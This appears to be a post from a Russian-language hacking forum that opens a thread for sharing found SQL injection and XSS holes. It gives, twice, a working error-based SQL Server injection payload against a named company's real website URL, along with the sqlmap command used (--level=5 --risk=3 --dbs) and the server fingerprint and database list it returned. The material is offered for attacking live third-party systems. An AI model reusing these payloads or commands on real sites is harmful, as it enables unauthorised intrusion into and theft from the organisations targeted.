Пожалуйста, обратите внимание, что пользователь заблокирован
Общая тема для публикации найденных вами sql inj и xss.
Собственно начну топик
Parameter: Prod (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: Prod=1016 AND 4992 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4992=4992) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)))&ProdName=IntelliFlex Platforms
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ColdFusion, Microsoft IIS 7.5, JSP
back-end DBMS: Microsoft SQL Server 2012
available databases [5]:
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb
Собственно начну топик
Скрытый контент для зарегистрированных пользователей.
--url="https://info.teradata.com/doclist.cfm?Prod=1016&ProdName=IntelliFlex Platforms" --random-agent --level=5 --risk=3 --threads=5 --dbs
Parameter: Prod (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: Prod=1016 AND 4992 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4992=4992) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)))&ProdName=IntelliFlex Platforms
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ColdFusion, Microsoft IIS 7.5, JSP
back-end DBMS: Microsoft SQL Server 2012
available databases [5]:
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb